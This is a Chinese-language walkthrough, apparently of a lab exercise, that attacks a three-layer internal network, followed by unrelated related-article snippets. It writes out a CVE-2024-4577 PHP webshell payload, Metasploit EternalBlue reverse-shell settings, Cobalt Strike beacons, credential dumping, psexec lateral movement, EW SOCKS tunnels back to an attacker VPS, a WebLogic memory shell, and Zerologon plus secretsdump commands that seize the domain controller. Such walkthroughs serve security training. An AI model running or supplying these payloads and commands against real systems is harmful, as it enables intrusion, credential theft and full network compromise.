穿透三層內網VPC1

網絡拓撲:

打開入口web服務

信息收集發現漏洞CVE-2024-4577

PHP CGI Windows平臺遠程代碼執行漏洞(CVE-2024-4577)復現_cve-2024-4577漏洞復現-CSDN博客

利用POC:

執行成功,那么直接上傳馬子,注意,這里要找到網站的根目錄才能上傳成功,這里直接百度

<?php file_put_contents('..\htdocs\1.php','<?php eval($_POST["x"]);?>');?>

成功上傳,直接用哥斯拉連接

成功命令執行,并且發現2.0網段

先上線CS

正好是administrator權限,不需要再次提權

之前發現有2.0網段,這里進行主機探測和端口掃描

這里直接發現另外兩臺主機和相關端口

這里主機2.1發現開了445,這里驗證是否有永恒之藍漏洞可以直接打

果然有

這里CS會話遞交到MSF

這里注意先建立路由,使能連通內網機器2.1

run post/multi/manage/autoroute
run autoroute -p

利用永恒之藍:

因為這里2.1機器有防火墻,使該機器反向連接上線

這里2.140機器是出網web服務機器的另一張網卡

use exploit/windows/smb/ms17_010_eternalblue  # 使用該模塊
set payload windows/x64/meterpreter/reverse_tcp   # 在當前模塊設置一個payload,端口為該模塊提供端口
set rhost 192.168.2.1   # 設置目標主機
set lhost 192.168.2.140   # 設置監聽主機
set lport 1236
use exploit/multi/handler #回到exploit/multi/handler 模塊,設置監聽器以接受目標主機反向連接
set lhost 192.168.2.140  # 設置監聽主機
set lport 1236      
use exploit/windows/smb/ms17_010_eternalblue  # 回到exploit/windows/smb/ms17_010_eternalblue模塊
run

成功上線

這里再上線CS,因為處于內網,這里使用中轉上線

將馬子上傳目標機器

upload /root/Desktop/test2.exe C:/

執行上線

成功上線,這里進行信息收集,發現這臺機器只處于2.0網段

結合之前信息收集,這里還有一臺2.7的機器,那么下一步思路很明顯橫向移動

這里進行抓密碼

抓不到? 可能權限太高,這里進程注入降權至administrator權限

再次抓取密碼,成功

猜測2.7機器也是使用同一密碼,這里嘗試pxesec橫向

成功上線,這里查看網段,發現一3.0網段

主機發現和端口探測,這里上傳了fscan 來單個掃描3.12主機

發現一個weblogic服務,并且開放445端口,這里先嘗試是否有永恒之藍漏洞

很遺憾,并沒有

因為內網的web服務,使用ew工具進行代理轉發

根據網絡拓撲分析,這里使用二層的正向代理

首先在VPS機器上設置轉接隧道:

./ew_for_linux64 -s rcsocks -l 1080 -e 8888

在出網web服務器上監聽本機9999端口,并將9999端口接收到的代理流量,轉發給攻擊者的公網vps的8888端口:

ew_for_Win.exe -s lcx_tran -l 9999 -f VPS_IP -g 8888

在被控主機2.7機器啟動SOCKS v5代理服務端,并反彈到出網web服務器的8888端口?

ew_for_Win.exe -s rssocks -d 被控主機1IP -e 9999

代理成功

這里在物理機再建立一個全局代理

訪問3.12機器web服務,成功訪問

因為是weblogic框架,那漏掃器掃一下

注入內存馬

哥斯拉連接

上傳馬子上線CS

進行信息收集,發現一個10.0網段

主機發現和端口探測,發現10.10和10.12機器

試一下10和12機器是否存在永恒之藍

都不存在,好吧

嘗試抓密碼橫向

抓到明文,對方機器可能存在防火墻,那么這里不能再用反向上線,建立一個正向TCP監聽直接正向上線

信息收集發現12機器有域并且只在10.0網段

查找域控制器

正好是10.10這臺機器,,這里嘗試了抓取明文密碼橫向沒有成功,

另一種思路查看域控是否存在CVE-2020-1472,這個洞常在域控出現

設置socks代理,kali執行exp:

proxychains4 python3 cve-2020-1472-exploit.py dc 192.168.10.10

抓取管理員hash

proxychains4 python3 secretsdump.py dc\$@192.168.10.10 -just-dc -no-pass

得到管理員hash,直接PTH橫向DC

成功上線

至此測試完成

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/900973.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/900973.shtml
英文地址,請注明出處:http://en.pswp.cn/news/900973.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【計算機網絡】同步操作 vs 異步操作:核心區別與實戰場景解析

&#x1f4cc; 引言 在網絡通信和分布式系統中&#xff0c;**同步&#xff08;Synchronous&#xff09;和異步&#xff08;Asynchronous&#xff09;**是兩種基礎卻易混淆的操作模式。本文將通過代碼示例、生活類比和對比表格&#xff0c;幫你徹底理解它們的區別與應用場景。 1…

TensorFlow充分并行化使用CPU

關鍵字&#xff1a;TensorFlow 并行化、TensorFlow CPU多線程 場景&#xff1a;在沒有GPU或者GPU性能一般、環境不可用的機器上&#xff0c;對于多核CPU&#xff0c;有時TensorFlow或上層的Keras默認并沒有完全利用機器的計算能力&#xff08;CPU占用沒有接近100%&#xff09;…

Kubernetes容器編排與云原生實踐

第一部分&#xff1a;Kubernetes基礎架構與核心原理 第1章 容器技術的演進與Kubernetes的誕生 1.1 虛擬化技術的三次革命 物理機時代&#xff1a;資源浪費嚴重&#xff0c;利用率不足15% 虛擬機突破&#xff1a;VMware與Hyper-V實現硬件虛擬化&#xff0c;利用率提升至50% …

Windows 錄音格式為什么是 M4A?M4A 怎樣轉為 MP3 格式

M4A 格式憑借其高效的壓縮技術和卓越的音質表現脫穎而出&#xff0c;成為了包括 Windows 在內的眾多操作系統默認的錄音格式選擇。然而&#xff0c;盡管 M4A 格式擁有諸多優點&#xff0c;不同的應用場景有時需要將這些文件轉換為其他格式以滿足特定需求。 本文將探討 M4A 格式…

Qt之OpenGL使用Qt封裝好的著色器和編譯器

代碼 #include "sunopengl.h"sunOpengl::sunOpengl(QWidget *parent) {}unsigned int VBO,VAO; float vertices[]{0.5f,0.5f,0.0f,0.5f,-0.5f,0.0f,-0.5f,-0.5f,0.0f,-0.5f,0.5f,0.0f };unsigned int indices[]{0,1,3,1,2,3, }; unsigned int EBO; sunOpengl::~sunO…

HCIP-17 BGP基礎2

HCIP-17 BGP基礎2 一、bgp的路由黑洞問題 1.bgp的同步功能 ipv4-family unicast IPV4的地址簇 undo synchronization 關閉BGP同步功能 bgp的同步功能原理 當邊界路由器從ibgp鄰居收到一條路由后&#xff0c;會使用該路由和igp路由表進行比較。 如果在igp路由表中存在…

leetcode_15. 三數之和_java

15. 三數之和https://leetcode.cn/problems/3sum/ 1、題目 給你一個整數數組 nums &#xff0c;判斷是否存在三元組 [nums[i], nums[j], nums[k]] 滿足 i ! j、i ! k 且 j ! k &#xff0c;同時還滿足 nums[i] nums[j] nums[k] 0 。請你返回所有和為 0 且不重復的三元組。…

Open Interpreter:重新定義人機交互的開源革命

引言 在人工智能技術蓬勃發展的今天&#xff0c;人機交互的方式正經歷著前所未有的變革。Open Interpreter&#xff0c;作為一個開源項目&#xff0c;正在重新定義我們與計算機的互動方式。它允許大型語言模型&#xff08;LLMs&#xff09;在本地運行代碼&#xff0c;通過自然…

【JavaScript】錯誤處理與調試

個人主頁&#xff1a;Guiat 歸屬專欄&#xff1a;HTML CSS JavaScript 文章目錄 1. JavaScript 錯誤處理基礎1.1 錯誤類型1.2 try...catch 語句 2. 錯誤拋出與自定義錯誤2.1 throw 語句2.2 自定義錯誤類型 3. 異步錯誤處理3.1 Promise 錯誤處理3.2 async/await 錯誤處理 4. 調試…

算法基礎模板

高精度加法 #include <bits/stdc.h> using namespace std; const int N10005; int A[N],B[N],C[N],al,bl,cl; void add(int A[],int B[],int C[]) {for(int icl-1;~i;i--){C[cl]A[i]B[i];C[cl1]C[cl]/10;C[cl]%10;}if(C[cl])cl; } int main() {string a,b;cin>>a&…

自行搭建一個Git倉庫托管平臺

1.安裝Git sudo apt install git 2.Git本地倉庫創建&#xff08;自己選擇一個文件夾&#xff09; git init 這里我在 /home/test 下面初始化了代碼倉庫 1. 首先在倉庫中新建一個txt文件&#xff0c;并輸入一些內容 2. 將文件添加到倉庫 git add test.txt 執行之后沒有任何輸…

[MySQL]數據庫與表創建

歡迎來到啾啾的博客&#x1f431;。 這是一個致力于構建完善 Java 程序員知識體系的博客&#x1f4da;。 它記錄學習點滴&#xff0c;分享工作思考和實用技巧&#xff0c;偶爾也分享一些雜談&#x1f4ac;。 歡迎評論交流&#xff0c;感謝您的閱讀&#x1f604;。 本篇簡單記錄…

相機回調函數為靜態函數原因

在注冊相機SDK的回調函數時&#xff0c;是否需要設置為靜態函數取決于具體SDK的設計要求&#xff0c;但通常需要遵循以下原則&#xff1a; 1. 必須使用靜態函數的情況 當相機SDK是C語言接口或要求普通函數指針時&#xff0c;回調必須聲明為靜態成員函數或全局函數&#xff1a;…

《Vue Router實戰教程》4.路由的匹配語法

歡迎觀看《Vue Router 實戰&#xff08;第4版&#xff09;》視頻課程 路由的匹配語法 大多數應用都會使用 /about 這樣的靜態路由和 /users/:userId 這樣的動態路由&#xff0c;就像我們剛才在動態路由匹配中看到的那樣&#xff0c;但是 Vue Router 可以提供更多的方式&#…

Debezium報錯處理系列之第128篇:增量快照報錯java.lang.OutOfMemoryError: Java heap space

Debezium報錯處理系列之第128篇:增量快照報錯java.lang.OutOfMemoryError: Java heap space 一、完整報錯二、錯誤原因三、解決方法Debezium從入門到精通系列之:研究Debezium技術遇到的各種錯誤解決方法匯總: Debezium從入門到精通系列之:百篇系列文章匯總之研究Debezium技…

通過MCP+數據庫實現AI檢索和分析

通過 MCP&#xff08;Multi-Agent Collaboration Platform&#xff0c;多智能體協作平臺&#xff09; 數據庫&#xff0c;實現一個AI檢索和分析系統。 一、系統目標 實現通過 AI 多智能體對結構化&#xff08;數據庫&#xff09;和非結構化&#xff08;文檔、文本&#xff09…

【教學類-102-08】剪紙圖案全套代碼08——Python點狀虛線優化版本02(有空隙)+制作1圖2圖6圖24圖

背景需求 代碼實現了點狀虛線的全套流程,但是圖片中主體圖案和虛線與左右兩邊粘連。 【教學類-102-07】剪紙圖案全套代碼07——Python點狀虛線優化版本01(無空隙)+制作1圖2圖6圖24圖-CSDN博客文章瀏覽閱讀665次,點贊11次,收藏11次。【教學類-102-07】剪紙圖案全套代碼07…

循環神經網絡 - 長短期記憶網絡

在之前的博文中&#xff0c;我們介紹了循環神經網絡的長程依賴問題及改進方案&#xff0c;可以參考&#xff1a;循環神經網絡 - 長程依賴問題及改進方案-CSDN博客 但是改進方案只是可以緩解梯度消失&#xff0c;并不能徹底解決梯度爆炸問題和記憶容量(Memory Capacity)問題。 …

LLM應用開發(七)--記憶

1.LangChain記憶模塊 底層原理&#xff1a;在最新一次問題時&#xff0c;帶上前面的人機對話歷史內容 1.1.具體方式 緩沖記憶 緩沖窗口記憶&#xff08;限定存儲會話信息次數&#xff09; 令牌緩沖記憶 摘要總結記憶 摘要緩沖混合記憶 向量存儲庫記憶

Unity VideoPlayer 播放無聲音

增加一個videoPlayer下掛&#xff0c;audiorSource腳本 this.videoPlayer.EnableAudioTrack(0, true); this.videoPlayer.audioOutputMode VideoAudioOutputMode.AudioSource; this.videoPlayer.SetTargetAudioSource(0, this.videoPlayer.GetComponent<AudioSource>()…